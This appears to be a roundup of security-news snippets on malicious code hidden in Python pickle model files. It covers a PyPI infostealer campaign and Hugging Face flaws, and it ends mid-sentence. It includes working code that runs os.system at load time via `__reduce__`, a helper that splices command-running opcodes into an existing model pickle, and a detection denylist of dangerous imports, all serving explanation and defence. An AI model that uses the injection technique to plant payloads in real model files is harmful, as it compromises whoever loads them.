The popular Python Pickle serialization format, which is common for distributing AI models, gives attackers ways to inject malicious code that is executed the moment a model is loaded.
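The mechanism is pickle's `__reduce__` hook: an object may return any callable plus arguments, and the unpickler invokes that callable during loading. A minimal sketch of the idea; the class name and the harmless `echo` command are illustrative stand-ins for an attacker's payload:

```python
import os
import pickle

class MaliciousPayload:
    # pickle serializes whatever __reduce__ returns: a callable plus
    # its arguments. The unpickler calls that callable at *load* time.
    def __reduce__(self):
        # Harmless stand-in for an attacker's command of choice.
        return (os.system, ("echo payload ran at load time",))

blob = pickle.dumps(MaliciousPayload())

# Any consumer that loads this "model" runs the command immediately;
# no attribute access or method call on the object is needed.
pickle.loads(blob)
```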
Researchers have concocted a new way of manipulating machine learning (ML) models by injecting malicious code into the serialization process itself. The method focuses on the "pickling" step used to serialize Python objects, model weights included, into a single byte stream.
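Crucially, the attacker does not need to build a model from scratch: opcodes can be spliced into an already-serialized file so the payload runs first and the legitimate object still loads normally afterwards. A rough sketch of that splicing under simple assumptions (the `inject` helper is hypothetical, the `echo` command is a benign stand-in, and the argument must not contain quote characters; tools such as Trail of Bits' fickling automate and generalize this):

```python
import pickle

def inject(original: bytes, module: str, func: str, arg: str) -> bytes:
    """Prepend opcodes that call module.func(arg) at load time, discard
    the result, then fall through to the untouched original stream."""
    payload = (
        b"c" + module.encode() + b"\n" + func.encode() + b"\n"  # GLOBAL
        + b"(S'" + arg.encode() + b"'\n"                        # MARK, STRING
        + b"tR"                                                 # TUPLE, REDUCE (the call happens here)
        + b"0"                                                  # POP the return value
    )
    return payload + original

model_bytes = pickle.dumps({"weights": [0.1, 0.2]})
evil = inject(model_bytes, "os", "system", "echo injected")

# Runs os.system first, then returns the original dict unchanged.
print(pickle.loads(evil))
```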
A new campaign exploiting machine learning (ML) models via the Python Package Index (PyPI) has been observed by cybersecurity researchers. ReversingLabs said threat actors are using the Pickle file format to conceal malicious payloads inside seemingly legitimate model files.
Fake Alibaba Labs AI SDKs hosted on PyPI included PyTorch models with infostealer code inside. With tooling for detecting malicious code inside ML models still scarce, expect the technique to spread; a rudimentary opcode scan is sketched below.
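Because a pickle is effectively a small program rather than inert data, detection has to reason about its opcode stream, not byte signatures. A rough sketch of a static scan using the standard library's pickletools; the denylist and the crude string tracking are illustrative simplifications, and real scanners cover far more imports and heuristics:

```python
import os
import pickle
import pickletools

# Hypothetical denylist; real scanners track many more dangerous imports.
SUSPICIOUS = {"os.system", "posix.system", "nt.system",
              "builtins.exec", "builtins.eval", "subprocess.Popen"}

def scan_pickle(data: bytes) -> list[str]:
    """Statically walk the opcode stream (nothing is executed) and flag
    imports that have no business inside a model file."""
    findings, strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            strings.append(arg)  # crude operand tracking for STACK_GLOBAL
        elif opcode.name == "GLOBAL":  # protocols 0-3
            ref = str(arg).replace(" ", ".")
            if ref in SUSPICIOUS:
                findings.append(ref)
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:  # protocol 4+
            ref = f"{strings[-2]}.{strings[-1]}"
            if ref in SUSPICIOUS:
                findings.append(ref)
    return findings

bad = pickle.dumps(os.system)       # pickles as a bare import of the callable
print(scan_pickle(bad))             # e.g. ['posix.system'] on Unix
```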
Two critical security vulnerabilities in the Hugging Face AI platform opened the door to attackers looking to access and alter customer data and models. One of the security weaknesses gave attackers a ...